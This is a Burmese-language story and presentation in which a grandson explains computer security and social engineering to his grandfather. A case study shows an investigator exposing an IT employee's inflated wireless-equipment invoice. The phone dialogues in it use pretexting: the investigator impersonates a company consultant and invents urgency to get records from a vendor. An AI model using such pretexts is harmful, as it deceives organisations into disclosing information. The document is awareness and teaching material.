“လူသိများတဲ့ social engineer တွေ ထဲမှာ Frank Abagnale လည်းပါခဲ့ပါတယ်။ နောက်ပြီး Kevin Mitnick ဆိုရင် ကွန်ပြူတာဟက်ကင်းနဲ့ လုံခြုံရေးကို လေ့လာနေသူတွေနဲ့ နည်းပညာသမားတွေ ပိုသိကြတယ်ဗျ။ ကျော်ကြားတဲ့ social engineering နည်းလမ်း တစ်ချို့ကို အဖိုးကို ထပ်ပြောပြမယ်ဗျ။” လို့ မင်းမောင်မောင်က ဆက်ပြောရင်း သူ့ရဲ့ presentation ဖိုင်တစ်ခုကိုဖွင့်လိုက်ပါတယ်။

ကျော်ကြားတဲ့ Social engineering နည်းလမ်းများ”………

နေရာတိုင်းမှာ၊ လုံခြုံရေးလိုနေတယ်ဆိုတာ၊ ခင်ဗျားပုံဖေါ်ကြည့်ဖူးပါသလား?

Security Everywhere

ဒီနေ့ခေတ်ကို၊ သီအိုရီအရ နည်းပညာခေတ်လို့ ခေါ်ကြပါတယ်။ ဒါပေမယ့်၊ နည်းပညာဆိုတာဘာတွေလဲ? လူတွေက နည်းပညာလို့ပြောလိုက်တာနဲ့ ကွန်ပြူတာတွေ၊ ၀က်ဘ်ဆိုဒ်တွေ၊ ကွန်ယက်ချိတ်ဆက်မှုတွေ၊ ပရိုဂရမ်တွေကိုပဲ မြင်ကြပါတယ်။ နည်းပညာဆိုတာ အဲဒီထက်ပိုပါတယ်။ ကွန်ပြူတာ –တွက်ချက်မှုများစွာကို အချိန်နဲ့အမျှအမြန်ဆုံးတွက်ချက်၊ အဖြေထုတ်ပေးပါတယ်။ ၀က်ဘ်ဆိုဒ် –အချက်အလက်တွေရှာဖွေဖို့ ကျွန်တော်တို့သုံးလေ့ရှိကြတယ် — ၎င်းက သိပ္ပံပညာရှင်တွေ၊ အချင်းချင်း စမ်းသပ်မှုတွေ ဖလှယ်ဖို့ နည်းလမ်းတွေ ရှာဖွေရင်းက အစပြုခဲ့တာလို့ ပြောနိုင်ပါတယ်။ ကွန်ယက်ချိတ်ဆက်မှု — ဟုတ်ပါတယ်၊ အချက်အလက်တွေ အမြန်ဆုံးဖလှယ်နိုင်ဖို့၊ ဆက်သွယ်ရေးစနစ် ကောင်းကောင်းတစ်ခုလိုတာပေါ့။ ပရိုဂရမ် — အစီအစဉ်လို့ ဘာသာပြန်နိုင်ပါတယ် — ၎င်းက၊ အစီအစဉ် နံပါတ်တစ်ခုပြီးရင်နောက်တစ်ခုကဘာဖြစ်မယ်၊ တကယ်လို့များ၊ အစီအစဉ်တစ်ခုရဲ့ နောက်ဆက်တွဲက၊ သတ်မှတ်မှုတစ်ခုခုနဲ့ ကိုက်ညီတယ်ဆိုရင်၊ အစီအစဉ် နံပါတ်ဘယ်လောက်ကို စတင်မယ်၊ အဲလိုမဟုတ်ရင်တော့ အစီအစဉ်နံပါတ်ဘယ်လောက်ကို၊ စတင်ရမယ် စတဲ့၊ အစီအစဉ်တွေကို ဆက်တိုက်လုပ်ဆောင်နိုင်ဖို့ ကြိုတင်အစီအစဉ်ချထားတဲ့ ကြားခံတစ်ခုပါပဲ။
ဒါဆို၊ ဟုတ်ပါတယ်၊ ကျွန်တော်တို့ တွေးရမှာ နည်းပညာဆိုတာကိုပေါ့။ ကွန်ပြူတာတွေ၊ ကွန်ယက်တွေ၊ ၀က်ဘ်တွေ နဲ့ ပရိုဂရမ်တွေက ဘာအတွက် ပေါ်ပေါက်လာတာလဲ၊ ဘာရည်ရွယ်ချက်နဲ့လဲ? ဟုတ်ပါတယ်၊ မိနစ်တိုင်းမှာ၊ မျက်စိတစ်မှိတ်တိုင်း ပြောင်းလဲနေတဲ့ တိုးတက်မှုနဲ့အတူ တွေ့ကြုံလာရတဲ့ လိုအပ်ချက်တွေ၊ အခက်အခဲတွေကို၊ ဖြေရှင်းနိုင်ဖို့ နည်းလမ်းတွေကို တည်ဆောက်ပြီး၊ အသုံးပြုလာကြပါတယ်။
ကွန်ပြူတာဆိုတာကိုတွေးကြည့်ရအောင်၊ — လက်နှိပ်စက်တစ်လုံးကို စွဲစွဲလမ်းလမ်းသုံးနေတဲ့ စာရေးဆရာအဖိုးက၊ မြေးလုပ်သူ မင်းမောင်မောင်ကို “မြေးရေ၊ မင်းပြောပြောနေတဲ့ ကွန်ပြူတာက ငါ့ လက်နှိပ်စက်နဲ့ ဘာများ ကွာခြားလို့လဲကွာ၊ လက်ကွက်ပုံစံကိုက ငါ့ ဘော်ဒါကြီး ကို အတုယူထားတာပါကွာ” လို့မေးခဲ့ပါတယ်။ — ခင်ဗျားဆိုရင်ရော၊ ဘာပြန်ဖြေမလဲ “ဟုတ်ကဲ့၊ ကျွန်တော့ ကွန်ပြူတာက၊ လက်နှိပ်စက်ထက်သာတယ်၊ သူက၊ လက်နှိပ်စက်အပြင် တီဗွီတစ်လုံးပါတယ်ဗျ” လို့တော့ ခင်ဗျားမဖြေလောက်ပါဘူးနော်?– “ကွန်ပြူတာက တွက်ချက်မှု ပရိုဂရမ်တွေပါတယ်ဗျ၊ အဖိုး ခေါင်းထဲမှာ၊ စာရွက်ပေါ်မှာ တွက်ချက်မှုတွေလုပ်ပြီး၊ လက်နှိပ်စက်ကြီးနဲ့ စာရိုက် ပြီးတော့၊ ဖိုင်ကြီးတွေ၊ ဘီဒိုကြီးတွေနဲ့ ရိုက်ထားတဲ့စာတွေသိမ်း၊ အဲဒီအထဲက၊ လိုအပ်တာကို ပြန်ရှာဖို့၊ တစ်နေ့လုံးအချိန်ယူရတာမျိုးမဟုတ်တော့ဘူး၊ စာရိုက်တာ၊ ရိုက်ဖို့ ကိန်းဂဏန်းတွေ၊ စာလုံးရေတွေ စသဖြင့်တွေကို ရိုက်နေရင်းတစ်ခါထဲ၊ တွက်ချက်နိုင်ပြီး၊ ရိုက်ထားတဲ့ အချက်အလက်တွေကို သိမ်းဖို့၊ ဘီဒိုကြီးတွေ၊ ဖိုင်ကြီးတွေမလိုတော့ဘူး၊ လိုအပ်တာပြန်ရှာမယ်ဆိုရင်လဲ ရှာဖွေရေး ပရိုဂရမ်တွေပါတယ်၊ ပြီးတော့၊ အဖိုးရေ၊ ကာဗွန်လည်း ခဏခဏလည်းဖို့မလိုတော့ဘူးလေဗျ။ အရေးကြီးတဲ့၊ လုံခြုံရေးနည်းလမ်းကိုလည်း၊ အဖိုးကိုယ်တိုင်ပုံစံချပြီး၊ လွယ်လွယ်လေး အသုံးပြုနိုင်တယ်ဗျ၊ ဥပမာ – အဖိုး အချိန်ကုန်ခံပြီးရိုက်ထားတဲ့ အချက်အလက်တွေကို၊ မပျောက်သွားအောင်၊ ပျက်စီးမသွားအောင်၊ အလွယ်လေး ပုံတူပွားပြီး၊ တခြားတစ်နေရာရာမှာ သိမ်းထားနိုင်သေးတယ်၊ အရံထားရှိခြင်း (back up) လို့ခေါ်တယ်ဗျ” မြေးကဖြေခဲ့ပါတယ်။ အခု၊ အဖိုးက ကွန်ပြူတာ စတင်သုံးဖို့ စဉ်းစားခဲ့ပါတယ်။
ဒါပေမယ့်၊ အဖိုးက “backup ဟုတ်လား?” အဖိုးခေါင်းထဲမှာ စဉ်းစားစရာနည်းနည်းရှိလာပါပြီ။ “ဘာလို့ အရံထားတာလဲ၊ မင်းတို့ ကွန်ပြူတာ ဆိုတာ၊ ငါ့ သံဘီဒိုကြီးတွေလောက် စိတ်မချရဘူးလားကွ?” မြေးလုပ်သူလဲတော်တော်စဉ်းစားရ ခက်သွားပါတယ်။ ဒါပေမယ့် မြေးက– မဆိုင်းမတွပဲ —
“အဖိုးရေ၊ လုံခြုံရေးအတွက်ပါ။ အဖိုးပြောတဲ့ သံဘီဒိုကြီးကိုပဲ စဉ်းစားကြည့်ပါ၊ အဖိုးရဲ့ အချက်အလက်တွေကို သံဘီဒိုကြီးထဲမှာ၊ သော့ကြီးကြီးခတ်ပြီးသိမ်းထားပေမယ့်၊ အဖိုးရဲ့ ပြိုင်ဖက်တစ်ဦးက၊ စာမှုပို့ဖို့ ရက်ချိန်းနီးမှ အဖိုးသံဘီဒိုသော့ကို ဖျက်ဆီးပြီး၊ အဖိုးရဲ့ လပေါင်းများစွာ၊ နှစ်ပေါင်းများစွာ ရေးထားတဲ့ စာမှုတွေ၊ သီအိုရီတွေ၊ အဖိုးဉာဏ်ကွန့်မြူးထားတဲ့ အရေးအသားတွေကို၊ ခိုးယူသွားမယ်၊ ဒါမှမဟုတ်၊ ဖျက်စီးခဲ့မယ်ဆိုရင်၊ အဖိုးက၊ သံဘီဒိုကြီးရှေ့မှာ၊ စိတ်ဓါတ်ကျစွာနဲ့ ထိုင်မှိုင်နေပြီး၊ အဖိုးရဲ့ဖန်တီးမှုတွေအားလုံး ဆုံးရှုံးသွားပြီလို့၊ သိတဲ့အချိန်၊ ပြန်ရနိုင်မယ့် နည်းလမ်းလေးများ ရှိမလားလို့ မျှော်လင့်မိလာပါလိမ့်မယ်။ တကယ်လို့သာ၊ ပုံတူပွားထားခဲ့ရင် ဆိုတဲ့ အတွေးတွေ တွေးမိလာမယ်၊ ဆိုတာ ကျွန်တော်သေချာပြောနိုင်တယ်။” လို့ မင်းမောင်မောင်က သွက်လက်စွာရှင်းပြခဲ့ ပါတယ်။
ဒါပါပဲ၊ ကျွန်တော်တို့နေ့စဉ်ဖြတ်သန်းနေရတဲ့၊ ပတ်ဝန်းကျင်ကလည်း၊ ပြောင်းလဲတိုးတက်မှုဖြစ်စဉ်တစ်ခုပါပဲ။ ကျွန်တော်တို့ ကာကွယ်ချင်တာ တွေ၊ ဆုံးရှုံးမှာကြောက်ကြတာတွေ၊ နောက်ကြောင်းပြန်လှည့်ဖို့ ၀န်လေးကြတာတွေ၊ ဖြတ်သန်းခဲ့ရတဲ့ အချိန်တွေကို တန်ဖိုးထားကြရတာတွေ စတဲ့၊ အကြောင်းအမျိုးမျိုးတွေက၊ ကျွန်တော်တို့ အတွေးတွေထဲမှာ၊ လုံခြုံရေးဆိုတဲ့ စကားလုံးကို ထင်ရှားလာစေပါတယ်။
လုံခြုံရေးဆိုတာ၊ မလိုအပ်သေးပါဘူး၊ ငါ့ကိုတော့ ဘယ်သူမှ အချိန်ကုန်ခံပြီး၊ အားနည်းချက်ရှာနေမှာမဟုတ်ဘူးလို့ခင်ဗျားတွေးရင်၊ ခင်ဗျားနေ့စဉ်ဘာလို့ အ၀တ်အစားတွေဝတ်တာလဲ၊ ခင်ဗျား ရုံးစားပွဲခုံကို၊ ခင်ဗျားရုံးဆင်းရင် ဘာလို့ သော့ခတ်ခဲ့တာလဲ၊ ခင်ဗျားအိမ်မှာမရှိတဲ့ အချိန်မှာရော၊ ဘာလို့ အိမ်တံခါးကို သော့ခတ်တာလဲ၊ ခင်ဗျား အပြင်သွားရင်ဘာလို့ ဖိနပ်စီးသွားတာလဲ၊ နေပူရင် သို့မဟုတ် မိုးရွာရင် ဘာလို့ ထီးဆောင်းကြတာလဲ၊ ခင်ဗျားနေပူစာလုံရင်တောင်၊ ဘာလို့ နေလောင်ခံကရင်တွေ လိမ်းတာလဲ၊ ဘာလို့နေကာမျက်မှန်တွေ တပ်ထားတာလဲ၊ ခင်ဗျားသွားနေတဲ့လမ်းမှာ၊ ဖြတ်သွားတဲ့ကားရဲ့ မီးခိုးငွေ့တွေ ကျန်ခဲ့ရင်၊ ခင်ဗျား နှာခေါင်းနဲ့၊ ပါးစပ်ကို ဘာလို့အုပ်လိုက်တာလဲ၊ ဆိုတာတွေပါ ထည့်သွင်းစဉ်းစားကြည့်ပေးပါ။ ခင်ဗျားရဲ့ အိမ်နီးချင်းက၊ ခင်ဗျား အိမ်က ကြိုးမဲ့ကွန်ယက်ထုတ်လွှင့်ထားတာကိုမြင်ရင်၊ သူပထမဆုံး စဉ်းစာတာက၊ ဘာများဖြစ်လိမ့်မလဲလို့ ခင်ဗျားသိချင်စိတ်ဖြစ်ဖူးပါသလား?

ရိုက်စားလုပ်တဲ့ အိုင်တီငနဲ

scamIT

“အဖိုးရေ၊ ဒီမှာ ကျွန်တော့်ရဲ့ presentation လေး အကြောင်းပြောပြပါရစေ” ပြောရင်း မင်းမောင်မောင်က presentation ကိုစတင်လိုက်ပါ တယ်။
မိတ်ဆက်ခြင်း ။ ။ ကျွန်တော်က မင်းမောင်မောင်ပါ၊ ဆိုက်ဘာ လုံခြုံရေးအကြောင်းကို လေ့လာနေသူတစ်ဦးဖြစ်ပါတယ်။ ကျွန်တော့် လေ့လာမှုတွေကတော့ “ဂူဂယ်” မှာ ရှာဖွေလေ့လာတာပါ၊ ပြီးတော့၊ အဓိကရင်းမြစ်ကတော့၊ Hacker High School (www.hackerhighschool.org) မှာလေ့လာသင်ယူဖြစ်တာ ပိုများပါတယ်။ သူတို့ကတော့ အကျိုးအမြတ်အတွက်လုပ်တဲ့ အဖွဲ့အစည်း မဟုတ်ပါဘူး၊ အရာဝတ္တုတွေ ဘယ်လို အလုပ်လုပ်ကြတယ်ဆိုတာကို၊ ပုံဖေါ်ခြင်းနည်းလမ်းတစ်ခုအဖြစ် ဟက်လုပ်ခြင်းအားလေ့လာနိုင်ရန် ဆယ်ကျော်သက်တွေကို ကူညီပေးပြီး၊ အခုဆို HHS အကယ်ဒမီကျောင်း စတင်ဖို့လုပ်နေပြီး၊ ဗွီဒီယိုသင်ခန်းစာတွေလည်း ရတော့မယ်။ ပြီးတော့၊ ကျွန်တော်တို့လို အခက်အခဲရှိသူတွေအတွက် အခမဲ့သင်ခန်းစာတွေ ပို့ချပေးပါတယ်။ သူတို့ရဲ့ ဆောင်ပုဒ်တစ်ခုနဲ့ ဟက်ကင်းအပေါ် ခံယူချက်ကို အတိုချုံးအားဖြင့် ပြောပြပါရစေ။ “အရာရာတိုင်းကို ဟက်ပါ ဒါပေမယ့် မထိခိုက်ပါစေနဲ့” ၊ ပြီးတော့ “ဟက်ကင်းဆိုတာ ပြဿနာဖြေရှင်းခြင်း နဲ့ လေ့လာသင်ယူခြင်း ဖြစ်ပါတယ်။” သိပ်မကြာခင်မှာ၊ HHS ရဲ့ ပရောဂျက်မန်နေဂျာ တည်ထောင်နေတဲ့ (S4H) www.schoolforhackers.org မှာလည်း ဗွီဒီယိုသင်ခန်းစာတွေနဲ့၊ လေ့လာ သင်ယူ မှုတွေ လုပ်နိုင်တော့မှာပါ။
အကြောင်းအရာ ။ ။ ကျွန်တော် ပြောပြမယ့်အရာကတော့၊ ကုမ္ပဏီတစ်ခုမှာ နည်းပညာကိုနားမလည်လို့၊ ကိုယ့်အပေါ် ယုံကြည်အားကိုး ထားတဲ့ သူတွေအပေါ် ရိုက်စားလုပ်သွားတဲ့ အလိုကြီးအရနဲ အိုင်တီသမား တစ်ယောက်အကြောင်းပဲဖြစ်ပါတယ်။
လုပ်ငန်းစလိုက်ရအောင်
တစ်စုံတစ်ဦးထံမှ၊ ကုန်ကျစရိတ်အကြောင်းကိုကြားလိုက်ရတဲ့အခါ စုံစမ်းသူ မျက်လုံးပြူးသွားခဲ့ပါတယ် “point to point ကြိုးမဲ့ ချိတ်ဆက်မှု ကုန်ကျစရိတ်က၊ ဒေါ်လာသုံးထောင် ဟုတ်လား? အကွာအဝေးက ဘယ်လောက်လဲ၊ ကြားမှာ ကွယ်နေတဲ့ အဆောက်အဦးတွေ ရှိလား? ပြီးတော့၊ ဘာပစ္စည်းတွေ သုံးထားလဲ?” ဟု စုံစမ်းသူက ဆက်မေးခဲ့ပါတယ်။ “အဲ၊ အကွာအဝေးက ကားလမ်းအားဖြင့် ၅.၆ ကီလိုမီတာ၊ ဒါပေမယ့် တိုက်ရိုက် မြင်နေရတာကြောင့် အတိုင်းအတာအားဖြင့် ၃ ကီလိုမီတာ ကျော်ကျော်လောက် ဝေးတယ်၊ သုံးထားတဲ့ ပစ္စည်း ကိုတော့အတိအကျ မသိသေးဘူး။” ဟု တစ်စုံတစ်ဦးက ဖြေခဲ့ပါတယ်။ စုံစမ်းသူက ၎င်း အရင်အလုပ်လုပ်ခဲ့တဲ့ ကုမ္ပဏီဖြစ်နေတာကြောင့်၊ ကုမ္ပဏီ abc အတွက်၊ စုံစမ်းရန် ဆုံးဖြတ်ခဲ့ပါတယ်။ ပြီးတော့ ချက်ချင်း ဆိုသလို ထိုကုမ္ပဏီ abc ၏ အတွင်းရေးမှုဆီကို ဖုန်းအဆက်အသွယ် လုပ်ခဲ့ပါတယ်၊ ဒါပေမယ့် ဒီအခြေအနေမှာ သိကျွမ်းပြီးသား ဆိုပေမယ့် ဘယ်သူ့ကိုမှ ယုံကြည်လို့ မရသေးတာကြောင့် လူမှုရေးကို လုပ်ဇာတ်ခင်းခြင်း (social engineering) ကို အသုံးပြုခဲ့ပါတယ်။
စကားစမြည် –
“ စုံစမ်းသူ ။ ။ အတွင်းရေးမှုးရေ၊ မတွေ့တာကြာပြီ။ အားလုံးနေကောင်းကြလား?
အတွင်းရေးမှုး။ ။ ဟုတ်ကဲ့၊ ကောင်းကြပါတယ်။ အကိုရော၊ ဘာတွေလုပ်နေလဲ?
စုံစမ်းသူ။ ။ အခုတော့၊ point to point wireless နက်ဝေါ့ခ်တစ်ခု၊ လုပ်ဖို့လိုလို့ အဖွဲ့တွေလိုက်စုံစမ်းနေတာ၊ ဒါပေမယ့်၊ ဖုန်းတွေက ဆက်လို့မရဖြစ်နေတာနဲ့၊ ဘာမှကိုမစုံစမ်းရသေးဘူးဗျာ၊ လူကြီးကလဲ စုံစမ်းပေးဖို့ လောနေပြီလေ၊ ဒါနဲ့ တလောကပဲ အဲဒီမှာ၊ ချိတ်ထားတယ် ကြားလို့၊ လူကြီးကိုပြန်ပြောဖို့ ခန့်မှန်း၊ ကုန်ကျစရိတ်နဲ့၊ သုံးထားတဲ့ ပစ္စည်းလေးများ သိမလားလို့၊ အကူအညီတောင်းမလို့ ဆက်လိုက်တာဗျ။ အပန်းမကြီးရင် ကူညီပါဦး ဗျာ။
အတွင်းရေးမှုး။ ။ ဟုတ်တယ်၊ တလောကပဲ တပ်ဆင်ပြီးတယ်။ ရပါတယ်၊ ကူညီနိုင်ပါတယ်၊ ဒါပေမယ့် ဘာတွေဆိုတာတော့မပြောတတ်ဘူး ရုံးက IT Manager တင်ထားတဲ့ ဈေးနှုန်းစာရင်းတော့ရှိတယ်၊ အီးမေးလ် ပို့ပေးလိုက်မယ်လေ။
စုံစမ်းသူ။ ။ ကျေးဇူးတင်လိုက်တာဗျာ၊ “
မကြာခင်မှာပဲ၊ ဈေးနှုန်း စာရွက် နဲ့ သုံးထားတဲ့ပစ္စည်း စာရင်း ၊ email ရောက်လာပါတယ်။ စုံစမ်းသူက၊ secretary@abc.com ဆိုတဲ့မေးလ်ကို ရင်ခုန်စွာနဲ့ ပဲဖွင့်လိုက်ပါတယ်၊ “ဟာ၊ သုံးထားတဲ့ ပစ္စည်းတွေက point to point အတွက်မှ ဟုတ်ရဲ့လား? ပြီးတော့ ၀ယ်တဲ့ ဆိုင်နာမည်ရဲ့ စာခေါင်းစည်း ကြည့်ရတာလဲ တစ်ခုခုမှားနေသလိုပဲ”

Y ကုမ္ပဏီ
သို့ : အိုင်တီ မန်နေဂျာ (abc ကုမ္ပဏီ)
အကြောင်းအရာ။ ။ point to point wireless ချိတ်ဆက်မှု အတွက် ကုန်ကျစရိတ်

# Item # Description Qty per Item Total
1 AM-5G20-90 4.9-5.9GHz airMAX Base Station, 1 850 850
Cisco Air 20dBi, 90 deg w/ rocket kit
2 ROCKETM5 5GHz Rocket MIMO, airMAX 1 350 350
3 PBM5 5GHz PowerBridge MIMO, airMAX 1 650 650
4 TC-Carrier TOUGH Cable, Level 2 1 100 100
6 IL-SRV2 Complete Setup Installation 1 1000 1000
TOTAL US$ 2950

“အင်း သေချာကြည့်ရင် ခေါင်းစီးက ၀ါးနေသလိုပဲ၊ scan ဖတ်ပြီး၊ ပြန်ပြင်ထားပုံရတယ်၊ သေချာတာကတော့ နံပါတ် ၁. AM-5G20-90 က Ubiquiti model ပါ၊ Cisco Air ဆိုတာ ဘာကြီးလဲ? နောက်ပြီး TC-Carrier က ဘာလို့အဲဒီလောက်တောင် လိုအပ်တာလဲ?” အဲဒီကုမ္ပဏီကို ဖုန်းဆက်ပြီး တစ်ခုခု သိအောင်ကြိုးစားကြည့်ဖို့၊ စုံစမ်းသူက ဆုံးဖြတ်လိုက်ပါတယ်။
စုံစမ်းခြင်း တစ်နည်းဆိုရင် လူမှုရေးလုပ်ဇာတ်တစ်ခု။
စုံစမ်းသူ။ ။ ဟလို၊ Y ကုမ္ပဏီကပါလား?
Y ကုမ္ပဏီ။ ။ ဟုတ်ကဲ့၊ ဘာများကူညီရမလဲ ခင်ဗျာ?
စုံစမ်းသူ။ ။ ကျွန်တော်က ကုမ္ပဏီ abc က နည်းပညာ အကြံပေးပါ။ ကျွန်တော်တို့ ကုမ္ပဏီက တလောက ခင်ဗျားတို့ဆီက၊ wifi ၀န်ဆောင်မှုကိုဝယ်ယူ ထားပါတယ်၊ အခု ကုမ္ပဏီ စာရင်းစစ်ဌာနက၊ အသုံးစရိတ် အစည်းအဝေးမှာ တင်ပြဖို့၊ ပြေစာလေးတောင်းလာလို့ပါ။ ကျွန်တော်တို့ အိုင်တီ မန်နေဂျာက၊ နယ်ခရီးလမ်းမှာရောက်နေတော့၊ ဆက်သွယ်လို့မရဘူးဖြစ်နေပါတယ်။ ကျေးဇူးပြုပြီး၊ အဲဒီပြေစာကော်ပီလေးကို၊ ကျွန်တော်တို့ ရုံးရဲ့ စီမံဌာနကို၊ မေးလ်ပို့ပေးဖို့ အကူအညီတောင်းချင်လို့ပါ။ ကူညီပေးနိုင်မလား ခင်ဗျာ?
Y ကုမ္ပဏီ။ ။ ကျွန်တော်တို့၊ အရောင်း မန်နေဂျာကို အတည်ပြုပြီး ရင်ပြန်ဆက်သွယ်ပေးပါမယ်။
စုံစမ်းသူ။ ။ ဖြစ်နိုင်ရင် ဖုန်းကိုင်ထားပါရစေ၊ အခု ကျွန်တော်တို့ ဒါရိုက်တာကလည်း ကုမ္ပဏီအသုံးစရိတ် အစည်းအဝေး အတွက် စောင့်နေတာကြောင့်၊ အခက်အခဲရှိနေလို့ပါ။ ဒါမှမဟုတ်၊ အဲဒီတုန်းက စုစုပေါင်းကုန်ကျ စရိတ်ကိုပဲ အခုပြောပေးလို့ရနိုင်မလား၊ ခင်ဗျာ။
Y ကုမ္ပဏီ။ ။ ကျွန်တော်တို့ အခုပဲ အကြောင်းကြားပြီး၊ ဖုန်းလွှဲပေးလိုက်ပါမယ်၊ ခဏစောင့်ပါ ခင်ဗျာ။
Y ကုမ္ပဏီ အရောင်းမန်နေဂျာ။ ။ ကျွန်တော်တို့ ကူညီပေးနိုင်ပါတယ်၊ အဲဒီတုန်းက စုစုပေါင်းကုန်ကျစရိတ်က ၁၆၀၁ ဒေါ်လာပါ၊ ဒါပေမယ့် ကော်ပီကိုတော့ စီမံဌာနရဲ့ အီးမေးလ်လိပ်စာကိုပဲ ပို့ပေးနိုင်ပါမယ်၊ ခင်ဗျာ။
စုံစမ်းသူ။ ။ ဟုတ်ကဲ့၊ ကျေးဇူးတင်ပါတယ်၊ ကျွန်တော်တို့ စီမံရဲ့အီးမေးလ်လိပ်စာက secretary@abc.com ကို ပို့ပေးပါ၊ ကျွန်တော်တို့ ဒါရိုက်တာ ရုံးခန်းကို တိုက်ရိုက်ရောက်ပါတယ်။
ကော်ဖီတစ်ခွက်နဲ့၊ ကွန်ပြူတာရှေ့ထိုင်နေတဲ့ စုံစမ်းသူဆီ၊ ကုမ္ပဏီ abc ရဲ့ secretary ဖုန်းခေါ်ဆိုလာပါတယ်။ ပြီးတော့၊ “အခု Y ကုမ္ပဏီက အီးမေးလ် တစ်စောင် ၀င်လာတယ်၊ ပြီးတော့၊ သို့ နေရာမှာ၊ abc ကုမ္ပဏီ IT Manager နာမည်နဲ့၊ ဖြစ်နေပြီး အီးမေးလ်ရဲ့၊ subject မှာ as mr. investigator’s request လို့ပါနေလို့၊ ဖုန်းခေါ်လိုက်တာပါ။” လို့မေးခဲ့ပါတယ်။ စုံစမ်းသူက “ဟုတ်တယ်၊ အဲဒါ စာရင်းအမှန်ပဲ၊ Y ကုမ္ပဏီ ဆီကနေ၊ တောင်းလိုက်တာပါ အဲဒီထဲမှာပါတဲ့ စာရင်းကိုသေချာ စစ်ဆေးကြည့်နိုင်အောင်လို့ abc ကုမ္ပဏီ ရဲ့ အတွင်းရေးမှုးဆီပို့ ခိုင်းခဲ့တာပါ။” လို့ ဖြေခဲ့ပါတယ်။
ကိုရိုက်စားရဲ့ အားနည်းချက်ကတော့၊ သူကိုယ်တိုင် ကျွမ်းကျင်မှုမရှိပဲ၊ သူ့လောက်မတတ်တဲ့ သူတွေအပေါ် လှည့်စားချင်တဲ့ သဘောထား ပါပဲ။
ကုမ္ပဏီ Y ရဲ့ မူရင်းစာရင်းကိုကြည့်ရအောင် ။ ။
Y ကုမ္ပဏီ
သို့ : အိုင်တီ မန်နေဂျာ (abc ကုမ္ပဏီ)
အကြောင်းအရာ။ ။ point to point wireless ချိတ်ဆက်မှု စာရင်း
# Item # Description Qty per Item Total
1 AM-5G20-90 4.9-5.9GHz airMAX Base Station, 1 164 164
20dBi, 90 deg w/ rocket kit
2 ROCKETM5 5GHz Rocket MIMO, airMAX 1 98 98
3 PBM5 5GHz PowerBridge MIMO, airMAX 1 297 297
4 TC-Carrier TOUGH Cable, Level 2 70 M 0.6 42
6 IL-SRV2 Complete Setup Installation 1 1000 1000
TOTAL US$ 1601

ကျွန်တော်တို့တွေ၊ ကိုယ်နားမလည်တဲ့ နယ်ပယ်တွေမှာ ကိုယ်စီ ရိုက်စားလုပ်ခံရတာတွေ အမြဲကြုံတွေ့နေရပါတယ်။ ဒါပေမယ့်၊ တကယ်လို့ ကူညီပေးမယ့်သူ တစ်ယောက် သာ ရှိခဲ့မယ်ဆိုရင်လို့ ကျွန်တော်တို့ အမြဲတွေးတတ်ကြပါတယ်။ တစ်ခါတစ်လေ၊ ကျွန်တော်တို့ အားကိုးတဲ့ သူတွေကပဲ ကျွန်တော်တို့ကို ရိုက်စားလုပ် နိုင်ပါတယ်။ ဗိုလ်ချုပ်အောင်ဆန်း မိန့်ခွန်းတစ်ခုဖြစ်တဲ့ “အနီးဆုံး ရန်သူကို ရှာတိုက်”၊ ဆိုတဲ့အတိုင်း၊ ကိုယ်ကိုယ်တိုင်က အနီးဆုံးရန်သူလို့ယူဆကြည့်ပါ၊ ကျွန်တော်တို့ ကိုယ့်ကိုယ်ကို အရင်ဆုံးပြန်မေးရမှာက၊ “ဒါ ဖြစ်နိုင်ရဲ့လား?” လို့ဖြစ်ပါတယ်။ ကျွန်တော်တို့ရဲ့ ယုံကြည်လွယ်ခြင်းကို၊ အရင်တိုက်ထုတ်သင့်ပါတယ်။ ပြီးတော့၊ အတွင်းလူ။ ယခု ရိုက်စားလုပ်ခြင်းမှာ၊ ကုမ္ပဏီရဲ့ဝန်ထမ်းတစ်ယောက်ဖြစ်တဲ့ ကိုရိုက်စားက ဘာကြောင့် ဒီလောက်အထိလုပ်ရဲ တာလဲ? ကျွန်တော်တို့ရဲ့ စီမံရေး၊ အုပ်ချုပ်ရေး၊ ၀န်ထမ်းတွေအတွက် ဗဟုသုတပညာပေးခြင်းတွေ လိုနေလား၊ ဒါမှမဟုတ် သူတို့ ကိုယ်တိုင်ပါဝင် ပတ်သက်နေတာလား? ၀န်ထမ်းတွေများစွာနဲ့ အလုပ်လုပ်နေတဲ့၊ ကုမ္ပဏီတစ်ခုက၊ တံခါးပေါက်များတဲ့ အိမ်တစ်လုံးနဲ့ တူပါတယ်။ တံခါး တစ်ချပ်တည်းကို လုံခြုံအောင် ဂရုစိုက်နေတာက တစ်အိမ်လုံး မလုံခြုံနိုင်ပါဘူး။
ဒါကြောင့်၊ ကျွန်တော်တို့လုပ်ငန်းတွေမှာ၊ ကျင့်ဝတ်ညီတဲ့ ဟက်ကာတစ်ယောက်ရှိဖို့နဲ့ ခိုင်မြဲတဲ့ ကွန်ပြူတာ၊ နက်ဝေါ့ခ် လုံခြုံရေးပေါ်လစီတွေ ရှိဖို့ သေချာကို လိုအပ်ပါတယ်။
“လူမှုရေးကို ဇာတ်လမ်းဆင်တဲ့၊ လူမှုရေးဇာတ်လမ်းဆင်ခြင်းတွေ ဆိုတာ၊ လိမ်တာပေါ့?” လို့ အဖိုးကမေးခဲ့ပါတယ်။
“လူမှုရေး ဇာတ်လမ်းဆင်ခြင်းဆိုတာ၊ လူတွေရဲ့ စိတ်ဓါတ်ရေးရာကြိုးကိုင်ခြင်းလို့ အတိုချုံးသိနိုင်ပါတယ်၊ တရားဝင်တဲ့ လိမ်လည်ခြင်းပေါ့၊ ဒါပေမယ့် ရုပ်ရှင်ရုံလို လူထူတဲ့နေရာတွေမှာ “မီးဗျို့” လို့တော့ မအော်နဲ့ပေါ့ ဗျာ။ လူမှုရေး ဇာတ်လမ်းဆင်ခြင်းကို အသေးစိတ်ပြောရရင်တော့။။”